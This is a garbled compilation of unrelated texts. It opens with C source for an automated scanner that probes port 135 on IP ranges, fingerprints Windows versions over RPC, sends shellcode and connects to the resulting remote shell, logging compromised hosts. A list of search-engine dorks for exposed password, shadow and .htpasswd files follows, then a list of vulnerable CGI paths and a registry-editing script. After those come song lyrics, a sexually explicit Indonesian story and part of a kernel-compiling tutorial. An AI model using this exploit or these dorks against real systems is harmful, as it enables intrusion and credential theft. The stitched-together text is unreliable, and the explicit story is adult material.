FILE *wxp;
int i;
fd_set fds;
//linea[strlen(linea-1)]='\0';

EnterCriticalSection(&csshell);

target_ip.sin_family = AF_INET;
target_ip.sin_addr.s_addr = inet_addr(linea);
target_ip.sin_port = htons(port);

if ((sock=socket(AF_INET,SOCK_STREAM,0)) != -1)
{
printf(" - Connecting to %s\n",linea);

tmp=1;
ioctlsocket( sock, FIONBIO, &tmp);
tv.tv_sec = CONNECT;
tv.tv_usec = 0;
FD_ZERO(&fds);
FD_SET(sock, &fds);

connect(sock,(struct sockaddr *)&target_ip, sizeof(target_ip));
//if((i=select(sock+1,0,&fds,0,&tv))!=SOCKET_ERROR)
// if (i!=0)
if((i=select(sock+1,0,&fds,0,&tv))>0)
{
printf(" Sending Exploit to a %s Server...",targets[peta].os);
tmp=0;
ioctlsocket( sock, FIONBIO, &tmp);
if (send(sock,bindstr,sizeof(bindstr),0)>0)
{
tmp=1;
ioctlsocket( sock, FIONBIO, &tmp);
tv.tv_sec = RECV;
tv.tv_usec = 0;
FD_ZERO(&fds);
FD_SET(sock, &fds);
if(select(sock +1, &fds, NULL, NULL, &tv) > 0)
{
recv(sock, buf1, 1000, 0);

lportl=htons(RPORT);
memcpy(&lport[1], &lportl, 2);
*(long*)lport = *(long*)lport ^ 0x9432BF80;
memcpy(&winshellcode[1351],&lport,4);
memcpy(winshellcode+916, (unsigned char *) &targets[peta].ret, 4);
tmp=0;
ioctlsocket( sock, FIONBIO, &tmp);

send(sock,winshellcode,1705,0);
sleep(50);
if ((sock2=socket(AF_INET,SOCK_STREAM,0)) !=-1)
{
target_ip.sin_family = AF_INET;
target_ip.sin_addr.s_addr = inet_addr(linea);
target_ip.sin_port = htons(RPORT);
tmp=1;
ioctlsocket( sock2, FIONBIO, &tmp);
tv.tv_sec = CONNECT;
tv.tv_usec = 0;
FD_ZERO(&fds);
FD_SET(sock2, &fds);
connect(sock2,(struct sockaddr *)&target_ip, sizeof(target_ip));
if((i=select(sock+1,0,&fds,0,&tv))>0)
{
printf("\n - Conectando con la Shell Remota...\n\n");
salir=0;
shell(sock2);
#ifdef WIN32
closesocket(sock2);
#else
close(sock2);
#endif
strcat(linea,"\n");
if (peta==0)
{
w2k=fopen("win2k.txt","a");
if (w2k!=NULL)
{ fputs(linea,w2k); fclose(w2k);}
else printf(" !!UNABLE TO LOG IP %s",linea);

}
else
{

wxp=fopen("winxp.txt","a");
if (wxp!=NULL)
{fputs(linea,wxp); fclose(wxp);}
else printf(" !!UNABLE TO LOG IP %s",linea);
}
//} else printf("UNABLE TO CONNECT TO SHELL\n");
} else printf("FAILED\n");
}
else printf("\n UNABLE TO CREATE SOCK2\n");
}
else printf(" FAILED to send Exploit2\n");
}
else printf(" FAILED to send Exploit\n");
}

}
//if (AUTOHACKING!=1)
LeaveCriticalSection(&csshell);

}

/*********************************************************************************/
char *givemeip(char *ip)
{

EnterCriticalSection(&cs);


if (ip1[3]!=254)
ip1[3]++;
else
{
ip1[2]++;
ip1[3]=1;
//return(NULL); //uhh!

}
if (ip1[2]==255)
{ ip1[2]++; ip1[1]++;}

LeaveCriticalSection(&cs);

if (ip1[2]>ip2[2]) return(NULL);
if (ip1[2]==ip2[2])
if (ip1[3]>ip2[3]) return(NULL);

sprintf(ip,"%d.%d.%d.%d",ip1[0],ip1[1],ip1[2],ip1[3]);

return(ip);
}

/******************************************************************************/

//int version(char *ip, int sock)

int version(char ip[16], int sock)
{
//sacado por ingenieria inversa del Scanner de ISS.


unsigned char peer0_0[] = {
0x05, 0x00, 0x0b, 0x03, 0x10, 0x00, 0x00, 0x00,
0xcc, 0x00, 0x00, 0x00, 0x84, 0x67, 0xbe, 0x18,
0x31, 0x14, 0x5c, 0x16, 0x00, 0x00, 0x00, 0x00,
0x04, 0x00, 0x00, 0x00, 0x01, 0x00, 0x01, 0x00,
0xb8, 0x4a, 0x9f, 0x4d, 0x1c, 0x7d, 0xcf, 0x11,
0x86, 0x1e, 0x00, 0x20, 0xaf, 0x6e, 0x7c, 0x57,
0x00, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a,
0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00,
0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00,
0x02, 0x00, 0x01, 0x00, 0xa0, 0x01, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0xc0, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x46, 0x00, 0x00, 0x00, 0x00,
0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11,
0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60,
0x02, 0x00, 0x00, 0x00, 0x03, 0x00, 0x01, 0x00,
0x0a, 0x42, 0x24, 0x0a, 0x00, 0x17, 0x21, 0x41,
0x2e, 0x48, 0x01, 0x1d, 0x13, 0x0b, 0x04, 0x4d,
0x00, 0x00, 0x00, 0x00, 0x04, 0x5d, 0x88, 0x8a,
0xeb, 0x1c, 0xc9, 0x11, 0x9f, 0xe8, 0x08, 0x00,
0x2b, 0x10, 0x48, 0x60, 0x02, 0x00, 0x00, 0x00,
0x04, 0x00, 0x01, 0x00, 0xb0, 0x01, 0x52, 0x97,
0xca, 0x59, 0xcf, 0x11, 0xa8, 0xd5, 0x00, 0xa0,
0xc9, 0x0d, 0x80, 0x51, 0x00, 0x00, 0x00, 0x00,
0x04, 0x5d, 0x88, 0x8a, 0xeb, 0x1c, 0xc9, 0x11,
0x9f, 0xe8, 0x08, 0x00, 0x2b, 0x10, 0x48, 0x60,
0x02, 0x00, 0x00, 0x00 };


unsigned char peer0_1[] = {
0x05, 0x00, 0x00, 0x03, 0x10, 0x00, 0x00, 0x00,
0xaa, 0x00, 0x00, 0x00, 0x41, 0x41, 0x41, 0x41,
0x80, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
0x05, 0x00, 0x06, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x28, 0x63, 0x29, 0x20,
0x75, 0x65, 0x72, 0x84, 0x20, 0x73, 0x73, 0x53,
0x20, 0x82, 0x80, 0x67, 0x00, 0x00, 0x00, 0x00,
0x80, 0x1d, 0x94, 0x5e, 0x96, 0xbf, 0xcd, 0x11,
0xb5, 0x79, 0x08, 0x00, 0x2b, 0x30, 0xbf, 0xeb,
0x01, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00,
0x5c, 0x00, 0x5c, 0x00, 0x41, 0x00, 0x00, 0x00,
0x41, 0x00, 0x41, 0x00, 0x5c, 0x00, 0x43, 0x00,
0x24, 0x00, 0x5c, 0x00, 0x41, 0x00, 0x2e, 0x00,
0x74, 0x00, 0x78, 0x00, 0x74, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00,
0xff, 0xff, 0xff, 0xff, 0x01, 0x00, 0x00, 0x00,
0x58, 0x73, 0x0b, 0x00, 0x01, 0x00, 0x00, 0x00,
0x31, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0xc0, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x46,
0x01, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00,
0x07, 0x00 };

/*

unsigned char win2kvuln[] = {
0x04, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x04, 0x5d, 0x88, 0x8a,
0xeb, 0x1c, 0xc9, 0x11,
0x9f, 0xe8, 0x08, 0x00,
0x2b, 0x10, 0x48, 0x60,
0x02, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00,
0x04, 0x5d, 0x88, 0x8a,
0xeb, 0x1c, 0xc9, 0x11,
0x9f, 0xe8, 0x08, 0x00,
0x2b, 0x10, 0x48, 0x60,
0x02, 0x00, 0x00, 0x00};
*/
fd_set fds2;
unsigned char buf[1024];

int l;
struct timeval tv2;
FD_ZERO(&fds2);
FD_SET(sock, &fds2);
tv2.tv_sec = RPC_FINGERPRINT_TIMEOUT;
tv2.tv_usec = 0;

memset(buf,'\0',sizeof(buf));
send(sock,peer0_0,sizeof(peer0_0),0);
if(select(sock +1, &fds2, NULL, NULL, &tv2) > 0)
{
l=recv (sock, buf, sizeof (buf),0);
// for(i=0;i<52;i++)
// {
// if (i==28) i=i+4;
// if (buf[i+32]!=win2kvuln[i])
// {
send(sock,peer0_1,sizeof(peer0_1),0);
if(select(sock +1, &fds2, NULL, NULL, &tv2) > 0)
{
memset(buf,'\0',sizeof(buf));
l=recv (sock, buf, sizeof (buf),0);
if (l==32)
{
closesocket(sock);
return(1);//winxp
}
else
{
#ifdef WIN32
closesocket(sock);
#else
close(sock);
#endif
return(0);//Unknown
}
}
else return(-1);
// }


//}
// closesocket(sock);
// return(0);//win2k
}
closesocket(sock);
return(-1); //Unknown
}
/********************************************************************************/

void checkea(void *threadn)
{
char ip[16];
char ip2[17];
int sock,i;
struct sockaddr_in target_ip;
fd_set fds;
u_long tmp=1;
struct timeval tv;


EnterCriticalSection(&css);
threads++;
sleep(1);
LeaveCriticalSection(&css);
memset(ip,'\0',sizeof(ip));
while (givemeip(ip)!=NULL)
{
//printf("Checkeando IP: %s\n",ip);
target_ip.sin_family = AF_INET;
target_ip.sin_addr.s_addr = inet_addr(ip);
target_ip.sin_port = htons(135);
closesocket(sock);
if ((sock=socket(AF_INET,SOCK_STREAM,0)) != -1)
{
tmp=1;
ioctlsocket( sock, FIONBIO, &tmp);
tv.tv_sec = CONNECT;
tv.tv_usec = 0;
FD_ZERO(&fds);
FD_SET(sock, &fds);

connect(sock,(struct sockaddr *)&target_ip, sizeof(target_ip));
//if((i=select(sock+1,0,&fds,0,&tv))==SOCKET_ERROR) { }
//if((i=select(sock+1,0,&fds,0,&tv))==SOCKET_ERROR) { }
// else if (i==0) {
// printf("i==0 ip: %s\n",ip); }
// else
if((i=select(sock+1,0,&fds,0,&tv))>0)
{
sprintf(ip2,"%s\n",ip);
EnterCriticalSection(&cslog);
fputs(ip2,results);
rpcopen++;
LeaveCriticalSection(&cslog);
attack(ip,version(ip,sock));


}
}
closesocket(sock);
memset(ip,'\0',sizeof(ip));
}
EnterCriticalSection(&css);
threads--;
sleep(1);
LeaveCriticalSection(&css);
//printf("Thread %i saliendo\n",(int)threadn);
_endthread();

}

/******************************************************************************/


Google hacking

*************************************

SEARCH PATHS....... more to be added

*************************************

"Index of /admin"
"Index of /password"
"Index of /mail"
"Index of /" +passwd
"Index of /" +password.txt
"Index of /" +.htaccess
index of ftp +.mdb allinurl:/cgi-bin/ +mailto

administrators.pwd.index
authors.pwd.index
service.pwd.index
filetype:config web
gobal.asax index

allintitle: "index of/admin"
allintitle: "index of/root"
allintitle: sensitive filetype:doc
allintitle: restricted filetype :mail
allintitle: restricted filetype:doc site:gov

inurl:passwd filetype:txt
inurl:admin filetype:db
inurl:iisadmin
inurl:"auth_user_file.txt"
inurl:"wwwroot/*."


top secret site:mil
confidential site:mil

allinurl: winnt/system32/ (get cmd.exe)
allinurl:/bash_history

intitle:"Index of" .sh_history
intitle:"Index of" .bash_history
intitle:"index of" passwd
intitle:"index of" people.lst
intitle:"index of" pwd.db
intitle:"index of" etc/shadow
intitle:"index of" spwd
intitle:"index of" master.passwd
intitle:"index of" htpasswd
intitle:"index of" members OR accounts
intitle:"index of" user_carts OR user_cart

ALTERNATIVE INPUTS====================

_vti_inf.html
service.pwd
users.pwd
authors.pwd
administrators.pwd
shtml.dll
shtml.exe
fpcount.exe
default.asp
showcode.asp
sendmail.cfm
getFile.cfm
imagemap.exe
test.bat
msadcs.dll
htimage.exe
counter.exe
browser.inc
hello.bat
default.asp\
dvwssr.dll
cart32.exe
add.exe
index.jsp
SessionServlet
shtml.dll
index.cfm
page.cfm
shtml.exe
web_store.cgi
shop.cgi
upload.asp
default.asp
pbserver.dll
phf
test-cgi
finger
Count.cgi
jj
php.cgi
php
nph-test-cgi
handler
webdist.cgi
webgais
websendmail
faxsurvey
htmlscript
perl.exe
wwwboard.pl
www-sql
view-source
campas
aglimpse
glimpse
man.sh
AT-admin.cgi
AT-generate.cgi
filemail.pl
maillist.pl
info2www
files.pl
bnbform.cgi
survey.cgi
classifieds.cgi
wrap
cgiwrap
edit.pl
perl
names.nsf
webgais
dumpenv.pl
test.cgi
submit.cgi
guestbook.cgi
guestbook.pl
cachemgr.cgi
responder.cgi
perlshop.cgi
query
w3-msql
plusmail
htsearch
infosrch.cgi
publisher
ultraboard.cgi
db.cgi
formmail.cgi
allmanage.pl
ssi
adpassword.txt
redirect.cgi
cvsweb.cgi
login.jsp
dbconnect.inc
admin
htgrep
wais.pl
amadmin.pl
subscribe.pl
news.cgi
auctionweaver.pl
.htpasswd
acid_main.php
access.log
log.htm
log.html
log.txt
logfile
logfile.htm
logfile.html
logfile.txt
logger.html
stat.htm
stats.htm
stats.html
stats.txt
webaccess.htm
wwwstats.html
source.asp
perl
mailto.cgi
YaBB.pl
mailform.pl
cached_feed.cgi
global.cgi
Search.pl
build.cgi
common.php
show
global.inc
ad.cgi
WSFTP.LOG
index.html~
index.php~
index.html.bak
index.php.bak
print.cgi
register.cgi
webdriver
bbs_forum.cgi
mysql.class
sendmail.inc
CrazyWWWBoard.cgi
search.pl
way-board.cgi
webpage.cgi
pwd.dat
adcycle
post-query
help.cgi

on/off script regeistry

// Program Regedit
// Nama Program: regedit.js
var vbCancel = 2;
var vbYesNoCancel = 3;
var vbYes = 6;
var vbNo = 7;
var vbQuestion = 32;
var vbInformation = 64;
var natan = WScript.CreateObject("WScript.Shell");
var pesan1 = "Pilihan Pengaman Regedit:\n\n"+
"[Yes] untuk Nonaktifkan Regedit.\n"+
"[No] untuk Aktifkan Regedit.\n"+
"[Cancel] untuk Keluar.\n\n"+
"[.::slackware_87::.]\n\n"+
"-> Nonaktifkan Regedit sekarang?"
var tanya = natan.popup(pesan1,0,"Pengaman Regedit",vbYesNoCancel+
vbQuestion);
if (tanya == vbYes)
{
natan.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion"+
"\\Policies\\System\\DisableRegistryTools",1,"REG_DWORD");
pesan2 = "Regedit Dinonaktifkan!"
natan.popup(pesan2,0,"Pengaman Regedit",vbInformation);
}
else if (tanya == vbNo)
{
natan.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion"+
"\\Policies\\System\\DisableRegistryTools",0,"REG_DWORD");
pesan3 = "Regedit Diaktifkan!"
natan.popup(pesan3,0,"Pengaman Regedit",vbInformation);
}
else
{
natan.popup("Terima Kasih.Thank You.slack.",0,"Pengaman Regedit",vbInformation);
}

todoke todoke

todoke todoke tooku e
ima wo kiss kaizen namida azukete
kono tobira wo mukou ni
mada miru asuka oto tsuneru kara
hajimare nagai nagai kimi monogatari

nakushite kizuite sakende mogaite utahibi ka
kono michi no sukoshi saki wo mata terashiteru
namidatte namidatta ureshii toki ni nagashitai
kirei na mizutamari uta detai no wa nani

minna miyo sora ni
mata taiteiru hoshi no kazu hodo no deai kara
ari wo manandari chizu wo morattari
tsunagau beku

todoke todoke tooku e
ima wo kiss kaizen namida azukete
kono tobira wo mukou ni
mada miru asuka oto tsuneru kara
hajimare nagai nagai kimi monogatari

sayounara to te wo futa ano kowa ichido mo ushiro mo
furikaerazuni hito nami nomarete kieta
kokoro no monsu wo kumoraseru no wa
jibun datsuiteta tame ikiseru
mada dekisaemo oshi ni dare mo
nakushiteta

todoke todoke tooku e
ima wo kiss kaizen namida azukete
kawaku kaze no naka demo
boku wa wakaranai izuni ni natte
hajimare nagai nagai kimi monogatari

sou hitori janai mo dekinai yo
demo jibun ni kaitarishinaide
hora kimi no ENJI wa shizukani hi ga tomoridasu
konya matsu no makaseru koto mo
tokuri janai kara umai ni yuuki
sonna kimi wa machigai janai sa
yea..yea..yea..yea..yea..

todoke todoke tooku e
ima wo kiss kaizen namida azukete
itsuka de kuru PEEJI ni
kitto takusan no hitokazu deru
hajimare nagai nagai kimi monogatari

koko kara hajimare hitotsu dake no kimi monogatari

Cerita dewasa xXx 1

Gemuruh suara penonton mungkin menjadi daya tarik tersendiri bagi sebagian orang yang datang ke stadion dengan kapasitas lebih dari 30 ribu orang ini. Mungkin juga permainan dua puluh dua orang yang tengah mengincar sebuah bola itu, tapi bagiku tak ada yang lebih menarik dari seraut wajah bernuansa latin yang tengah berlari-lari dilapangan. Rambutnya yang menyentuh tengkuk tapi tetap rapi sudah basah kuyup oleh keringat. Kulitnya yang walaupun tak terlalu bule tapi tergolong terang itu sudah merah, dan kelelahan dapat kulihat diwajahnya yang .. astaga tetap keren. Dan ketika peluit panjang berbunyi mata coklat itu segera melayang kearahku, tersenyum lelah sambil memberiku tanda menunggu di mobil.

Sambil mendengarkan radio dan menikmati kerumuman penonton yang sudah beranjak pulang, menunggu beberapa waktu sampai hampir bosan. Ajakan beberapa oficial untuk masuk kujawab dengan gelengan kepala.
” Hai, maaf lama sekali mereka bicara.” Wajah yang sudah segar itu mencium ujung kepalaku.
” Nggak apa-apa, aku yang bawa?”
” Aku sudah tidak capek.” Dibukanya pintu dan duduk dibelakang kemudi setelah melemparkan tasnya ke bangku belakang.
Mobilku tergolong kecil untuk ukuran tubuhnya, jadi tidak banyak ruang yang tersisa antara aku dan tubuh tegap itu. Samar dapat kucium bau cologne dan aftershavenya yang segar ,
” Sudah lapar?”
” Nggak terlalu, kamu?”
” Tidak juga. Nanti saja kita makan. Kamu tidak bekerja?”
” Proyek terakhir sudah selesai, belum masuk tahap berikutnya.”
” Kuliah kamu bagaimana?”
” Baik. Ray!” seruku saat tangannya menumpang di pahaku setelah memindahkan persneling.
” Tidak capek?” tanyanya berlagak tidak melihatku salah tingkah, jemarinya tidak lagi diam, mulai mengelus rok jeansku yang tidak terlalu tebal.
” Nggak.” Tenggorokanku mulai terasa kering, apalagi saat tangannya mengusap lututku yang muncul dari balik rok yang sedikit terangkat oleh gerakannya ,” Ray!”

” Ya, sayang ” diraihnya tanganku, dibawa kebibirnya. Tengkukku merinding saat bibirnya menciummi punggung tanganku, membaliknya dan lidahnya mulai menelusuri telapak tangan, berhenti sedikit lebih lama didenyut nadiku yang semakin cepat. Tanpa seperti inipun detak jantungku selalu cepat setiap kali berada di dekatnya hampir enam bulan belakangan ,
” Kenapa tangan kamu dingin sekali? nervous?”
Aku tak sanggup menjawab, dan saat tangannya melepasku untuk memindahkan persneling aku merasa lega sekaligus kehilangan. Tak sadar tanganku jatuh diatas pahanya yang kencang, yang hanya tertutup celana pendek kain warna krem.
” Biar saja disitu.” Serunya tertahan saat aku hendak menarik tanganku ,
” Seperti ini sayang .” jemarinya kembali bermain diatas pahaku, membuat lingkaran-lingkaran kecil yang membuat tubuhku panas. Tanpa suara jemariku mengikuti gerakannya, dan lelaki ini melenguh nikmat ,
” Yap .. kalau begini kita pulang saja ya?” maksudnya pasti ke rumahku, karena lelaki ini tinggal di asrama bersama pemain-lain.
” abis latihan, ya?” adik bungsuku menyambutnya dengan suka cita.
” ya ..’ sahutnya memasang tampang lelah ,” tidak sekolah?” tanyanya melihat adikku sudah pakai seragam. Dia memang masuk siang, tapi seringkali baru jam sepuluh atau sebelas sudah berangkat.
“sebentar lagi, nunggu teman.” Sahutnya sambil menghabiskan indomie diatas meja pantry, dan aku tengah berdiri dihadapannya, menuang segelas juice jeruk kesukaan Ray.
” Oh ..” Ray berdiri tepat dibelakangku, satu tangannya meraih gelas dan menguknya perlahan dengan suara keras, sementara satu tangannya bergerak perlahan dibelakang lututku, sedikit demi sedikit merayap naik dari luar kain rokku, mengusap pantatku perlahan dan meremas dengan tangannya yang besar.

Kugigit bibir, berusahaa tidak mengusik perhatian adikku saat tangannya kembali turun, dan merayap naik, tapi kali ini sudah dibalik rokku. Rasa panas menyerang tubuh bagian bawahku, tangan yang sedikit kasar itu mulai mngusap paha bagian dalamku, bermain main disitu sampai hampir menyentuh pinggiran celana dalamku alalu menariknya kembali. Mungkin dia tahu aku tidak akan tahan berdiam diri kalau dia tidak berhenti. Dan ketika suara motor berhenti di depan rumah dan adikku berlari membuka pintu, Ray menarik tubuhku sampai punggungku melekat erat didadanya, dan menarik pinggulku sampai sesuatu yang keras menyentuh pantat bagian atasku. Tangannya merayap kedepan, mengusap diluar kain yang kukenakan, menekan sedikit lebih keras diselangkanganku.
” Mbak berangkat.” Kedua lelaki itu berlari keluar ,” ray Ƃ¡’
” Ya.” Seru kami bersamaan dan bersamaan dengan itu Ray memutar tubuhku sampai menghadapnya, memegang belakang kepalaku dengan satu tangan dan mengusapkan bibirnya diatas bibirku, perlahan sampai nyaris tak terasa, lalu berubah menjadi lumatan sampai aku mendengar suara mengerang tanpa menyadari itu suaraku sendiri. Lidahnya masuk kebibirku melilit lidahku sampai nyaris kehabisan nafas, sementara tangan satunya kembali menggerayangi pahaku, kali ini sampai menyentuh celana dalamku yang sudah basah ,” mi amor.” Gumannya sambil mencium sisi leherku, membuatku menggelinjang kenikmatan.

Lalau tangannya tak lagi menyangga leherku, melainkan mengusap lenganku perlahan, dan bergerak kearah dada, bibirnya mengikuti tangannya dan menenggelamkan hidung mancungnya disela-sela payudaraku ouhg .. aku hanya bisa melenguh nikmat sambil meremas rambutnya. Aku sama sekali tak sadar kapan kaosku tersingkap keatas, tau-tau lidahnya sudah menyapu payudaraku dari balik BH ,
” so sweet.” Gumannya, membuka kait BH dan melumat bukitku yang tidak terlalu besar sampai masuk utuh kedalam mulutnya dan lidahnya berputar-putar mempermainkan puting yang mengeras, bergantian dengan remasan tangannya dia menikmati dadaku beberapa lama ,
” Ray Ƃ¡”
Lelaki itu tersenyum, memandangku lembut sambil menegakkan tubuh dan membuka kaosnya setelah membuka milikku, ditekannya kepalaku kedadanya yang bidang dan berbulu. Menirunya, kuciumi leher dan dadanya seperti apa yang dilakukannya barusan, jemariku terbelit bulu dadanya, dan semakin bersemangat dipermainkan putingnya yang tersembunyi saat mendengarnya menyebut namaku dengan suara parau.

Ray memindahkan tangannya kebelakang tubuhku, mengusap pantatku, pahaku dan membuat lingkaran kecil dengan jarinya diatas anusku yang masih terlindung CD, bergerak perlahan kedepan sampai diatas vaginaku, mengerang saat menyelipkan jarinya kedalam CDku dan seketika jari panjang itu basah ,” mi amor, sudah basah.” Dijauhkannya kepalaku dari dadanya, mendorong tanganku kebawah .. wow .. kapan dia membuka celana pendeknya?
Tanganku menyentuh benjolan besar terbungkuc CD kuusap perlahan seperti apa yang dilakukannya diatas vaginaku, ujungnya mulai mencuat keluar dari CD berwarna hitam yang sangat kontras dengan kulitnya itu, kusentuh dan Ray mengerang
” Ouhg ..ough .. ya sayang, ya ..” kali ini didorongnya kepalaku.

Dengan setengah berlutut aku menghadapi batang panjang yang langsung mencuat begitu Ray menurunkan CDnya ,
” cium, sayang Ƃ¡’
Diulurkannya kemulutku .., terpesona oleh batang yang terkadang bergerak itu, kulumat ujungnya, dan ray melenguh tanpa henti, rasanya senikmat es krim dan permen lolipop ..sambil memegang batangnya, kususuri kemaluan Ray sampai ke dua buah zakarnya ..
” sudah,” Ray menarik kepalaku, melangkah keluar dari celana pendek dan CDnya ,
” aku kunci pintu dulu.” Perlahan tubuh telanjang itu mengunci pintu rumah dan berbalik menatapku ..
” ray ..” lututku mulai lemas dan dengan langkah panjang dia kembali menghampiriku, memelukku dari belakang dan membawaku kedepan cermin bear yang terpasang diruang tengah.

Tubuhku kini hanya terbalut BH yang tak terkancing dan rok. Sambil tetap menatap cermin, kedua tangannya meremas payudaraku, mempermainkan putingnya sambil mulutnya tak henti mencium leher dan telingaku. Lalu tangannya turun, membuka kancing dan resleting rokku yang memang ada didepan. Melihat benda biru itu turun perlahan bersamaan dengan tangannya membuat vaginaku kembali basah, lalu tangannya kembali naik, dan turun lagi, kali ini dengan membawa CDku .. pandangan matanya yang lembut terpantul lewat cermin, dan anehnya sama sekali tak membuatku malu.

Ditekannya kemaluannya sampai terselip diantara pantatku
“ough .. nyaman sekali Ray ..”
Tangan kirinya bergantian mengusap payudaraku sementara tangan kananya mulai mendekati bibir vaginaku dan mulai menekannya, laLu .. jemarinya membuka bibir vaginaku dan masuk kedalam, menyentuh biji kacang hijau didalam
“Ough ray ” seruku sambil mencengkeram lengannya diatas payudaraku, lagi-lagi cairan keluar membuat vaginaku basah kuyup.
Mengerang keras, ray melepaskan pelukannya, memutar tubuhku hingga bersandar di rak TV sementar lelaki itu berlutut didepanku dan mulai memainkan lidahnya disana ough ..ough .. dijilatnya semua cairan yang tak berhenti keluar bahkan lidahnya yang kasar menusuk masuk, membuatku terpekik, sedotan dan jilatannya membuat tubuhku lemas .. ough .. belum pernah aku mengalami seperti ini!

” Ican’t stop.” Erangnya,
berdiri gagah dihadapanku, mengarahkan batangnya yang sudah sepenuhnya tegang ke vaginaku ,
” Tidak apa-apa.” Bujuknya
melihatku ketakutan.Dan nyatanya memang rasa takut itu habis terbakar gairahku sendiri. Ujung penisnya kini menyentuh lubang vaginaku, perlahan ,
” I hurt you?’
kugelengkan kepala perlahan, aku sudah tak sanggup bicara, dan Ray kembali mendorong penisnya maju .. ada rasa mengganjal ketika kepala penis itu masuk dan terpeleset keluar beberapa kali. Aku tahu, Ray harus menahan diri untuk melakukan selembut itu, keningnya mulai basah oleh keringat. Tatapan matanya yang tak pernah lepas dari mataku membuatku merasa diawang-awang, dan dia terus membimbing penisnya menyodoknya kuat tapi tetap pelan sampai “.. ah .. ray!”

Lelaki itu menghentikan perbuatannya terdiam beberapa lama sampai rasa nyeri diselangkanganku berangsur hilang dan berganti menjadi nikmat menyadari ada sesuatu yang mengisi hampir seluruh lubang vaginaku ough ..ough .. nimat sekali, ray menggoyangnya lembut dan aku mengerang dan mendesah sejadi-jadinya. Reflek kugoyangkan pantatku mengikuti gerakannya ” Ough mi amor ..!” tahu aku sudah mulai menikmati Ray menarik dan menghujamkan penisnya beberapa kali dan semakin lama semakin cepat ampai aku menjerit saat cairan tubuhku keluar lagi, membuatku lemas tak bertenaga. Tangan ray merengkuh seluruh tubuhku, mengangkat pantatku dengan tetap membenamkan penisnya divaginaku. Perlahan kakinya melangkah, dengan sedikit berjinjit dan bantuan tangannya bagian bawah tubuh kami tetap menyatu. Setiap langkah membuat vaginaku menjepit penisnya dalam posisi yang berubah-ubah, dan ough .. itu nikamt sekali.

Kelihatannya ray juga menikmatinya ..
” Jangan tutup mata, sayang, aku ingin melihatmu.” Sambil tetap bertatapan dan sesekali berciuman, kami berjalan mengelilingi ruangan .. terkadang ray melangkah begitu cepat sampai rasanya penisnya terpelintir dan kami bersamaan mengerang nikmat
” Sayang, aku sampai!” didorongnya tubuhku ke dinding, dengan menyangga pantatku dengan kedua tangannya, ray menghujamkan penisnya berkali-kali dengan keras sampai rasanya menyentuh ujung dinding rahimku .. Tubuhku sudah menggeletar nikta tak berdaya mengimbangi nafsunya yang memuncak ..”mi amor ..” mengerang keras, tangannya mencengkeram pantatku, meraiknya sampai seluruh batangnya benar-benar masuk tak bersisa dan menyemprotkan cairannya beberapa kali lalu berdiri lemas mendekap tubuhku .. ” kamu luar biasa ..Te amo!”bisiknya mendekapku erat. Kubalas pelukannya, sambil merasakan denyut penisnya yang masih tersimpan di vaginaku ..

beberapa hari kemudian kami melakukannya lagi, kali ini di mobilnya dengan posisi yang berbeda .. ah .. pemainku ini benar-benar hebat, tak hanya dilapangan!

Compile Kernel

Compile Kernel
Ahmad Munif
munifpro@diffy.com


Pendahuluan

Tulisan ini diharapkan menjadi panduan praktis untuk pemula yang baru kenal linux dan ingin melakukan recompile kernel. Saya hanya menuliskan apa yang saya ketahui dan berhasil diterapkan di komputer saya. Bila langkah-langkah kompilasi telah di lakukan dengan benar (sesuai dengan petunjuk) dan ternyata masih terjadi kesalahan, saya tidak bertanggung jawab atas kesalahan tersebut ;-D
Sekilas tentang Kernel dan Module

Kernel merupakan inti dari Operating System berisikan instruksi- instruksi yang bertindak sebagai mediator antara hardware dengan software. Kernel baru pada umumnya menawarkan dukungan yang lebih banyak terhadap ber bagai jenis hardware,memiliki manajemen proses yang lebih baik, berjalan lebih baik dari versi sebelumnya, dan lebih stabil karena adanya perbaikan pada bug-bug yang ditemukan pada versi sebelumnya.
Module merupakan bagian dari code kernel yang tidak secara langsung dimasukan kedalam kernel. Module dapat di masukan atau dihilangkan kedalam kernel yang sedang berjalan kapanpun diperlukan. Module biasanya digunakan untuk mendukung pekerjaan yg tidak di gunakan terus-menerus. misal, jika kita tidak membutuhkan dukungan networking sepanjang waktu, seperti ppp,maka lebih baik ppp dijadikan sebagai module. ketika kita memerlukannya (untuk koneksi ke isp) module kita panggil dan setelah selesai koneksi module dapat kita matikan. penerapan module seperti ini akan mengurangi jumlah memori yang di butuhkan kernel sehingga mempercepat operasi.

Configurasi Kernel
Ada 3 command yang dapat digunakan untuk mengkonfigurasi kernel
1. config (text-based)
2. menuconfig (text-based menu)
3. xconfig (under X )

Diantara ketiga cara tersebut, saya menyarankan untuk menggunakan "menuconfig". karena memiliki tampilan yang lebih menarik dan lebih fleksibel dalam konfigurasi daripada cara pertama (config).
Untuk memilih module dalam menuconfig di tunjukan dengan tanda (dengan menekan tombol m pada keyboard), jika <> menandakan module ini tidak digunakan. tanda <*> atau [*] (dengan menekan tombol y) digunakan untuk menyertakannya secara langsung kedalam kernel. Selama melakukan konfigurasi tidak banyak perubahan yang saya lakukan, apa yang telah ditandakan atau diberi tanda [*] tidak saya rubah. Kecuali hal-hal tertentu yang memang benar-benar tidak dibutuhkan oleh komputer saya, tanda bintangnya di hapus (biar ngak ikut di compile).
